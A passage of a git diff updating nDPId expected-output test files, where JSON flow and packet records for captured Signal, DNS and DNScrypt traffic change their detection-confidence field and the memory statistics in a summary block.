{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
-00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS 
(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-payload-len":273842,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":19,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1569051267601} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 637/637 @@ -143,9 +143,9 @@ ~~ total active/idle flows...: 19/19 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5964644 bytes -~~ total memory freed........: 5964644 bytes -~~ total allocations/frees...: 118908/118908 +~~ total memory allocated....: 6098278 bytes +~~ total memory freed........: 6098278 bytes +~~ total allocations/frees...: 121670/121670 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1427 chars diff --git a/test/results/simple-dnscrypt.pcap.out b/test/results/simple-dnscrypt.pcap.out index 2b08c7aa3..339b56c11 100644 --- a/test/results/simple-dnscrypt.pcap.out +++ b/test/results/simple-dnscrypt.pcap.out 
@@ -4,9 +4,9 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} 
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 